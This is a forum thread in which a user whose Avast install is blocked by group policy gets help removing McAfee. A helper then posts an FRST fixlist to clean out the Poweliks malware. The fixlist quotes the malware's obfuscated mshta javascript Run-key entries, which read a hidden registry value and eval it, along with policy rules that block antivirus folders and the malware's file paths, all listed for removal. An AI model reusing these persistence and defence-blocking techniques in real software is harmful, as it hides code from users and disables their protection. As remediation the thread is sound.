avast blocked by group policy

[REDACTED]

Hi, i've just installed Avast pro and i'm getting the above error when I try and start it up..

I've run the Fabar Recovery Scan tool, logs attached.

Please help, Mcafee was killing my machine !

thanks

Webman

[Eddy]

You should remove McAcrap before installing any other av.
http://www.ache.nl

[REDACTED]

I did !

Not sure why it's still showing in the list !

[Eddy]

Did you use the tool ?

[REDACTED]

Which tool ? I installed McFee from the control panel.

I ran the other tool and attached the 3 files to my initial post.

@confused ;-)

[Eddy]

You need to run the uninstall tool for McAfee, that is why I gave you that link.

[REDACTED]

Sorry, I didn't see the link. I've not got my computer with me at the mo, I'll check it out when I get home later.

Thanks for all your help.

[Eddy]

Take your time.
After removing McAfee, try to do a clean installation of avast.
https://forum.avast.com/index.php?topic=169255.msg1203279#msg1203279

If that fails, run Farbar again and attach the new logs.

[essexboy]

You have the latest variant of poweliks.  This is only the second time that I have seen this so it may take several runs as I will kill it by pieces

CAUTION :  This fix is only valid for this specific machine, using it on another may break your computer

Open notepad and copy/paste the text in the quotebox below into it:
 

CreateRestorePoint:
HKLM-x32\...\Run: [**3fdeaf54<*>] => mshta javascript:vog3nwYSB="Ygv5";R0X8=new%20ActiveXObject("WScript.Shell");WXZe4zlnY="NEB";UMw8z=R0X8.RegRead("HKLM\\software\\Wow6432Node\\b88f6968\\d7d3f891");vGYaHFm2e="Uz2";eval(UMw8z);HOZc14VTu= (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\COMODO <====== ATTENTION
HKLM Group Policy restriction on software:  C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software:  C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software:  C:\Program Files\Avira <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM\...\Policies\Explorer\Run: [61980944] => C:\ProgramData\msnvlgm.exe
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
HKU\S-1-5-21-366375899-1387106490-284134612-1001\...\Run: [**3fdeaf54<*>] => mshta javascript:yVT1laXCy="C1S";J14d=new%20ActiveXObject("WScript.Shell");YJv7AWh="7JVM";pr9xT=J14d.RegRead("HKCU\\software\\b88f6968\\d7d3f891");EL9o4fUHr="Tv9";eval(pr9xT);e1YkQOQz="Tf"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-366375899-1387106490-284134612-1001\...\Run: [**bc4486ce<*>] => mshta javascript:DYD1aob="yaV3V8";W8a=new%20ActiveXObject("WScript.Shell");bKGdj8ol="ezMu8VgPiH";Mf6n7U=W8a.RegRead("HKCU\\software\\b88f6968\\d7d3f891");dO7BoV7zGb="VcO8q0mdwY";eval(Mf6n7U);cP6GUIx2= (the data entry has 9 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-366375899-1387106490-284134612-1001\...\Run: [Svc2dll] => C:\Users\Steve\AppData\Local\svcxdcl32.exe [110592 2015-07-13] (Pulizia)
HKU\S-1-5-21-366375899-1387106490-284134612-1001\...\Run: [YaxmAfpa] => regsvr32.exe "C:\ProgramData\YaxmAfpa\KewowDilka.hss"
2015-07-13 21:52 - 2015-07-13 23:26 - 00000760 ____H C:\ProgramData\@system.temp
2015-07-13 21:52 - 2015-07-13 23:26 - 00000496 ____H C:\ProgramData\@system3.att
2015-07-13 21:51 - 2015-07-13 23:43 - 00000157 _____ C:\Users\Steve\AppData\Local\svcxdcl32.dat
2015-07-13 21:51 - 2015-07-13 23:39 - 00000000 ____D C:\Users\Steve\AppData\Roaming\ChromeUpdate
2015-07-13 21:51 - 2015-07-13 21:51 - 00000480 ____H C:\Users\Steve\AppData\Roaming\½???Ó???
2015-07-13 21:50 - 2015-07-13 21:49 - 00110592 _____ (Pulizia) C:\Users\Steve\AppData\Local\svcxdcl32.exe
2015-07-13 21:49 - 2015-07-14 02:08 - 00000000 ___HD C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
2015-06-27 00:11 - 2015-06-27 00:12 - 01331823 _____ (Igor Pavlov) C:\Users\Steve\Downloads\7z1505-x64.exe
CustomCLSID: HKU\S-1-5-21-366375899-1387106490-284134612-1001_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\FntCache.dll (sro rCptcfniaMotioroo)
C:\ProgramData\msnvlgm.exe
C:\Users\Steve\AppData\Local\svcxdcl32.exe
C:\ProgramData\YaxmAfpa
C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
RemoveProxy:
Reg: reg query "HKLM\software\Wow6432Node\b88f6968"
Reg: reg query "HKCU\software\b88f6968"
EmptyTemp:
CMD: bitsadmin /reset /allusers

 
Save this as fixlist.txt, in the same location as FRST.exe

Run FRST and press Fix
On completion a log will be generated please post that

THEN

Please run a fresh FRST scan so that I can track my progress